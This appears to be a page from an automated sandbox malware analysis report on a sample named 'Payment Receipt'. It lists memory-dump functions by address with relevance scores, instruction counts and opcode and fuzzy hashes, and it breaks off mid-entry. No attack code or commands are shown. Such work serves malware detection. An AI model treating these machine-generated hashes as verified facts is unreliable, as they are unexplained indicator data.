                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2a42598a332f88076d822fd556469786bf51ad087e9b53562bd074615b0028c4
                                                                      • Instruction ID: 5524b1ac8ae0a80e865bbe68dbd0ff17761ef1e4ce91622763fa8c0e283b2244
                                                                      • Opcode Fuzzy Hash: 2a42598a332f88076d822fd556469786bf51ad087e9b53562bd074615b0028c4
                                                                      • Instruction Fuzzy Hash: DB5177716083429FD755DF2AC882A6BBBE5BFC8A08F44492DF589C7350EB30D905CB96
                                                                      Function 015C45B1 Relevance: .2, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                      • Instruction ID: 435bdac57da02f5b8de852bf51b939641892914b4ecf7f8099f10c260ae32c6e
                                                                      • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                      • Instruction Fuzzy Hash: 76516B75E0021AAFDF169FD4C850FAEBBF5BF45B50F148069EA01AF240E734D9458BA0
                                                                      Function 01623A6C Relevance: .2, Instructions: 156COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fa34da52780e0422ff673bd6ca94f6bf6545d6830fb39769b2635868b22eb721
                                                                      • Instruction ID: 5f02839a09cd7d290f67f00d4a6c5dadfdca82926ba6bd15af3830ae6b737ce9
                                                                      • Opcode Fuzzy Hash: fa34da52780e0422ff673bd6ca94f6bf6545d6830fb39769b2635868b22eb721
                                                                      • Instruction Fuzzy Hash: C7517D32E4051D4BEF25CE68D861BEFB3E6FB94310F440859E915BB3C0C77A6946D950
                                                                      Function 0161D800 Relevance: .2, Instructions: 155COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 31b87882f5e129baac4ff14dd1afbded2ac8d82b20d9dc76492dcf50a5eea52e
                                                                      • Instruction ID: 74f0ac2ed9a3ff66be262df946bb8e559789ccb5c96284f29638f379659ad52b
                                                                      • Opcode Fuzzy Hash: 31b87882f5e129baac4ff14dd1afbded2ac8d82b20d9dc76492dcf50a5eea52e
                                                                      • Instruction Fuzzy Hash: CF51E070A00216ABDB24DF99C888ABDB7F6FF45700B098599ED45CB784E7349851CB90
                                                                      Function 0162E9E0 Relevance: .2, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                      • Instruction ID: c24aeb48241edab3b3603103553082d674777939644aaa2ac507753e7b0e54d7
                                                                      • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                      • Instruction Fuzzy Hash: 7251E931D00A2AEFDF119B94CD94BAEBB79BF40315F114275D91267290D7729D41CFA0
                                                                      Function 01667571 Relevance: .2, Instructions: 153COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a6df83271dc9fd4cafc6c354c0439d914f9912260dace8f9e6280538804aa08d
                                                                      • Instruction ID: 113914289d5e7bc2e3d43cecd98d5635eff858de85755bd33e6dd847cbfa6b38
                                                                      • Opcode Fuzzy Hash: a6df83271dc9fd4cafc6c354c0439d914f9912260dace8f9e6280538804aa08d
                                                                      • Instruction Fuzzy Hash: 4851F431A0012AABDB159F78DC44A7EBBBEFF48348F044169D901E7250DB70AD11CBC0
                                                                      Function 01668B28 Relevance: .2, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 49946f2f22956c7e76cf5dc3a2b4212deeae5bfb2cfeb7342d8512028940ec33
                                                                      • Instruction ID: aef7e4ace824de62a26ec685685b2ecd60913bd85ecf5bcece776fb9bd6ef0b2
                                                                      • Opcode Fuzzy Hash: 49946f2f22956c7e76cf5dc3a2b4212deeae5bfb2cfeb7342d8512028940ec33
                                                                      • Instruction Fuzzy Hash: 4641DFB1701712ABEB29DB3DCC94B7BBB9EEFD0220F088219E95597384DB34D801C691
                                                                      Function 0162CBF0 Relevance: .1, Instructions: 148COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 47d192992e1f12b4d0393d552389557b428a4c3d171545a1e362371e25b50193
                                                                      • Instruction ID: 2a193166c413f4b160a32f71bb0ddcbdd5b4a6b449a8f3e4cf7b0d5045d7f0ae
                                                                      • Opcode Fuzzy Hash: 47d192992e1f12b4d0393d552389557b428a4c3d171545a1e362371e25b50193
                                                                      • Instruction Fuzzy Hash: 37519D72A0062ADFCB20DFA9CD909AEBBB9FF88354B514919D505AB700D770AD01CFE0
                                                                      Function 01625BF0 Relevance: .1, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b05a65aa8433d5da9e862406f161016bf2ada2983c30b59cc5fa613b0adae174
                                                                      • Instruction ID: 68f86e6fc422df2d3a016200fede1140bb5415a281088f5e6a081b659cc5a421
                                                                      • Opcode Fuzzy Hash: b05a65aa8433d5da9e862406f161016bf2ada2983c30b59cc5fa613b0adae174
                                                                      • Instruction Fuzzy Hash: EB41EA32B40B275B8F36BFB9CC526ED76A5AF54611B00452EE803EB384EB3498014F69
                                                                      Function 0166A9D3 Relevance: .1, Instructions: 139COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                      • Instruction ID: 8784567ec55377bae0f3389ddb7f53dc3e9d6feacf828c4223efa451790e0603
                                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                      • Instruction Fuzzy Hash: 3541C331600716AFD725CFA8CD84A6AB7ADFF80214B05862EED529B740EB30ED05C794
                                                                      Function 015D01F8 Relevance: .1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67f3f020b267802873f329343c6865bfdd98f3cf4eb1aa91351d3439834991ac
                                                                      • Instruction ID: 7e9d05b84b5be5354794704a23d7271d92129cbbd574944e8b6085c93df39dac
                                                                      • Opcode Fuzzy Hash: 67f3f020b267802873f329343c6865bfdd98f3cf4eb1aa91351d3439834991ac
                                                                      • Instruction Fuzzy Hash: C1418B76D0121A9BDB24DF9CC440AEEBBB4BF88710F14816AF915EB390DB359D41CBA4
                                                                      Function 015CEBFC Relevance: .1, Instructions: 138COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4bc93b43a9b83a68492316d3880d5c21e1b4eb7e332268157575ba63f937b248
                                                                      • Instruction ID: 6a7596d81a033589926471fef3c6fdcf9da7b09aeb04b6418d0e6ab1c42cc8d5
                                                                      • Opcode Fuzzy Hash: 4bc93b43a9b83a68492316d3880d5c21e1b4eb7e332268157575ba63f937b248
                                                                      • Instruction Fuzzy Hash: 0141D2722003029FD725DF68CC85A5BBBE9FF88624F00486DE557CB751DB75E8448B61
                                                                      Function 015E2750 Relevance: .1, Instructions: 137COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                      • Instruction ID: 3f177929e5863a1f54d66caa748f6df3b2bd01551ed21434b9f9a739a43b96ca
                                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                      • Instruction Fuzzy Hash: 9C516A75A02255CFCB15CF98C980AAEF7B2FF84710F2881A9D915EB355D730AE42CB90
                                                                      Function 015A6154 Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f9443b37d5a12a628038dd2f7a4a8eec1733fe5689296ba4c685eb65c4d473c
                                                                      • Instruction ID: fd2f42aac6f8a3e6a2af6298afb2830dd702691daede72fee41f5e2df87ca9e2
                                                                      • Opcode Fuzzy Hash: 8f9443b37d5a12a628038dd2f7a4a8eec1733fe5689296ba4c685eb65c4d473c
                                                                      • Instruction Fuzzy Hash: B551F470940217DBDB2A8B28CC44BEDBBB5FF51314F1882A9E519AF2C1D734A981CF90
                                                                      Function 015A0BCD Relevance: .1, Instructions: 130COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4b36ae62c4b8ecc040f67c9eaab8dcd429a3a6184810f5370b2d4ef3f4798229
                                                                      • Instruction ID: fc1db3318ae18d9475b90268026b3e44f42b2652e1f4749f3e4bd67b05dba293
                                                                      • Opcode Fuzzy Hash: 4b36ae62c4b8ecc040f67c9eaab8dcd429a3a6184810f5370b2d4ef3f4798229
                                                                      • Instruction Fuzzy Hash: 4C419371A502299FDB21DF68C941BEEB7B4FF45740F4100A9EA08EF291D7749E81CB91
                                                                      Function 0166866E Relevance: .1, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                      • Instruction ID: 6bb0d7da48c38e25a3378f230488a321eddc394374e10ce5f1714a3f97aa8160
                                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                      • Instruction Fuzzy Hash: D1419175B10316ABEB15DFA9CC84ABFBBBEAF88600F144069E904E7341DB74DD0187A0
                                                                      Function 0166F0E0 Relevance: .1, Instructions: 129COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6f30b36b5844d14a5e3ea83a62e75b7837aae88beadf0551b734a9a4f46f7847
                                                                      • Instruction ID: a51c5a56c32e743d6f7d01149775cc9e9d2ff6c076813049a87d23bac9a3f78b
                                                                      • Opcode Fuzzy Hash: 6f30b36b5844d14a5e3ea83a62e75b7837aae88beadf0551b734a9a4f46f7847
                                                                      • Instruction Fuzzy Hash: 1141C3712043418BD704CF6AE8A987ABBE6FFC5615F04859DF9958B382CB30D819CBA1
                                                                      Function 015A0887 Relevance: .1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: df5c2009624c8f8dd5c03252687a05251be5bea9a84b927c5194963ab27a88a1
                                                                      • Instruction ID: a6e4c420ea6e3e731dd4634461c7b7a0395a6490f619c23d74721ad35dceed33
                                                                      • Opcode Fuzzy Hash: df5c2009624c8f8dd5c03252687a05251be5bea9a84b927c5194963ab27a88a1
                                                                      • Instruction Fuzzy Hash: 7E41C4716507029FE725CF28C880A2ABBF9FF89314B504A6DE5478FA90E730F855CB94
                                                                      Function 0164D5B0 Relevance: .1, Instructions: 128COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2b49e9631f1123ca1458cf93ce045bed9d2e116d0feebcffce7788e29acae503
                                                                      • Instruction ID: 48e5a2b7d91da7d72921326cc22d823b21aa74560a738f666cc9f4eda685f40a
                                                                      • Opcode Fuzzy Hash: 2b49e9631f1123ca1458cf93ce045bed9d2e116d0feebcffce7788e29acae503
                                                                      • Instruction Fuzzy Hash: BA41F130E082A59FCB15CF68C8916BAFBF1BF69300F05848AE5C58B346C735A456DB60
                                                                      Function 015CA470 Relevance: .1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 35f5628bce818368f246457668ac82777ccee208d91266d0292936630ff08200
                                                                      • Instruction ID: 57768729c9337a095b727263c36124434dfb666e5d258d9e95ac197db8853105
                                                                      • Opcode Fuzzy Hash: 35f5628bce818368f246457668ac82777ccee208d91266d0292936630ff08200
                                                                      • Instruction Fuzzy Hash: 5241BF3294021ACFDF25CFACDE887EE7BB4BB98754F044599D411AF285EB359901CBA0
                                                                      Function 015A8BF0 Relevance: .1, Instructions: 124COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f6d8e32304f1725687785f50dc7e4ab21fca12a2273c2d73e49c0b91dd1e5ec3
                                                                      • Instruction ID: 52782b22c6025d874ff50539caddba82d6b9709dea6721aa702dedfa1174970f
                                                                      • Opcode Fuzzy Hash: f6d8e32304f1725687785f50dc7e4ab21fca12a2273c2d73e49c0b91dd1e5ec3
                                                                      • Instruction Fuzzy Hash: A941DB32A40203CFD7299F5CDD94AAEBBB9FBD4604F65802ED9019F255DB359842CF90
                                                                      Function 01598918 Relevance: .1, Instructions: 123COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 96813b85a3877839569b6e03fa15996c930e2d3e60231838085e57536287d311
                                                                      • Instruction ID: 3a14f0bda2c49d2687f31e83fe48ab34ca1ee2cee441eec141c4a7adbb04773c
                                                                      • Opcode Fuzzy Hash: 96813b85a3877839569b6e03fa15996c930e2d3e60231838085e57536287d311
                                                                      • Instruction Fuzzy Hash: E3416D325183069ED712DF69C840A6BB7E9FF85B54F40092EFA84DB250E730DE048BA3
                                                                      Function 0159A020 Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                      • Instruction ID: b0b9ef4d6d34a548db8d2decc42baa065b1c09193b1a6d44824ee577337d8802
                                                                      • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                      • Instruction Fuzzy Hash: D5412731A00212DBEF25DE69C4847BEBBB1FB90754F15C06EEA559F244D6329D80CBA2
                                                                      Function 015A09AD Relevance: .1, Instructions: 122COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7c8aef29c18627a2b10af3e8e78509e796452d89b22710180294659630816b63
                                                                      • Instruction ID: 0c172cd2e3b8bb40bcebd8c7cccaf2ab8fa48e8ba4229bbbe9b7a0321bcce98f
                                                                      • Opcode Fuzzy Hash: 7c8aef29c18627a2b10af3e8e78509e796452d89b22710180294659630816b63
                                                                      • Instruction Fuzzy Hash: E8417C71650601DFD721CF18C840B6ABBF4FF94314F64896AE549CF291E770E941CB90
                                                                      Function 015D0710 Relevance: .1, Instructions: 121COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                      • Instruction ID: 3ed717462462bb686bac8591569cfa33cb9c1ef49f70825b7a1b710b4cc77d05
                                                                      • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                      • Instruction Fuzzy Hash: C241F475A00605EFDB24CFADC981AAABBF9FB18700F10496DE556DB691D330EA44CB90
                                                                      Function 015A262C Relevance: .1, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fcf1b593c472d7cbe066f1d71230525b17a5dbf959d53074095f26b158cb5292
                                                                      • Instruction ID: 4fbb2541ed98e9a393ebc99499478dcd8a02f0c5dba3d0b27783876ad7b37311
                                                                      • Opcode Fuzzy Hash: fcf1b593c472d7cbe066f1d71230525b17a5dbf959d53074095f26b158cb5292
                                                                      • Instruction Fuzzy Hash: 7041B1B1581702CFCB21EF28C941A6DBBF5FF94310F54856EC5069F6A1DB30AA41CB51
                                                                      Function 015DC8F9 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 74c78127e179dca3b6100452913d4698d8243be755ebe1c13499c68db5ae980b
                                                                      • Instruction ID: 03fa129ee7251dc09945cddc5ccc1c4b77479c7b0b3c6a4f1974b6d889a0c55e
                                                                      • Opcode Fuzzy Hash: 74c78127e179dca3b6100452913d4698d8243be755ebe1c13499c68db5ae980b
                                                                      • Instruction Fuzzy Hash: 843179B1A01346DFDB22CF68C440799BBF4FB49724F2085AED119EB251D776A902CB90
                                                                      Function 0166EEDB Relevance: .1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ff23a2cb8ba233b23fcb810b4e2c881ee41eaff075ba707ff382f494a8927485
                                                                      • Instruction ID: 7fc3b1a7a90a2a26c164f2b392b72f54d59a6fdb9bab12cb0d21f3abb53fbf93
                                                                      • Opcode Fuzzy Hash: ff23a2cb8ba233b23fcb810b4e2c881ee41eaff075ba707ff382f494a8927485
                                                                      • Instruction Fuzzy Hash: 0C41C233A0002A9BCB18CF68D89147AB7FAFF4830475642BDD905AB285DB74AD06CBD4
                                                                      Function 0166FA49 Relevance: .1, Instructions: 113COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c329d62b33439273b064202ef532053cdf155238f00764f3c469eb8fef3abe5
                                                                      • Instruction ID: acbe9e451ebc8c5d45fcc21d9be9d7626ac14f4abfddd8356da65436a9762311
                                                                      • Opcode Fuzzy Hash: 2c329d62b33439273b064202ef532053cdf155238f00764f3c469eb8fef3abe5
                                                                      • Instruction Fuzzy Hash: D6314B327001069BD718CE2DEC64AA77B9EEF84310F0485B8ED18CB385EB74D946C7A4
                                                                      Function 015980A0 Relevance: .1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbca5c13cee4c89eb01d44f83414b3c731ec31d800b92e7de56245a7868f937e
                                                                      • Instruction ID: 780647f50c2420e9a818cf6504c936acc07bc8936152a35625e55cdfefc84073
                                                                      • Opcode Fuzzy Hash: dbca5c13cee4c89eb01d44f83414b3c731ec31d800b92e7de56245a7868f937e
                                                                      • Instruction Fuzzy Hash: C141F4B1A0461ADFCF01DF18C880AACB7B1FF45760F148629D916AF280D734ED419BD1
                                                                      Function 016205A7 Relevance: .1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b66369d3001ac5d85475928cd99d7cb6ef000294ac678fd9ddadd92941615546
                                                                      • Instruction ID: 7405d1e69b0e337e893d8d13ba39d34188624ceca36fe2c68fc1a8b460af9323
                                                                      • Opcode Fuzzy Hash: b66369d3001ac5d85475928cd99d7cb6ef000294ac678fd9ddadd92941615546
                                                                      • Instruction Fuzzy Hash: EF41C472504A629FD324DF68CC80A6AB7E9FFC8740F14061DF9549B780E730E914CBA6
                                                                      Function 015A4859 Relevance: .1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1570000_Payment Receipt.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
